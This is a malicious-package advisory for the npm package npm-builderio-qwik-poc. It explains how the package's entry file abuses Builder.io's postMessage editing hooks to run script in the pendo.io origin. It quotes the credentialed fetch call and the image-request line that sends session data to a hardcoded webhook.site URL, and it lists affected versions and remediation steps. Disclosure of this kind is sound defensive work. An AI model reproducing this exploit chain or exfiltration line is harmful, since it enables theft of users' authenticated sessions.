npm · Malicious package advisory
Malwarenpm-builderio-qwik-poc
MAL-2026-4623
Malicious code in npm-builderio-qwik-poc (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (11a743cdce28dd141d636ff13baaee44df53fbaaed17efdc5a7380281b7097e1)
The package's main entry `index.js` is a working browser exploit, not a library. When loaded in a DOM context, it creates a hidden iframe pointing at `www.pendo.io?builder.frameEditing=true`, then sprays `builder.patchUpdates` postMessages whose `op:'replace'` payload on `/bindings/show` carries a JavaScript string that the Builder.io SDK's `stringToFunction()` passes to `Function()` — achieving script execution in the pendo.io origin. The injected script performs a credentialed `fetch('https://novus-api.pendo.io/pendo/app', {credentials:'include'})`, base64-encodes the response, chunks it, and exfiltrates each chunk via `new Image().src = 'https://webhook.site/236d0505-1750-49fe-907d-604b0934b5c7?chunk=...&d=...'` to a hardcoded attacker-controlled webhook. Any developer who bundles this package into a web application weaponizes their site against pendo.io users: visitors will silently leak authenticated pendo.io session data to the attacker. The exfil destination is hardcoded with no opt-in, configuration, or authorization gate, so the harm fires on every load regardless of consumer intent. There is no install-time or import-time Node side effect (the code requires a browser DOM), but the public API surface itself is the attack.
Compromised versions (5)
- 1.0.2
- 1.0.5
- 1.0.3
- 1.0.1
- 1.0.4
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.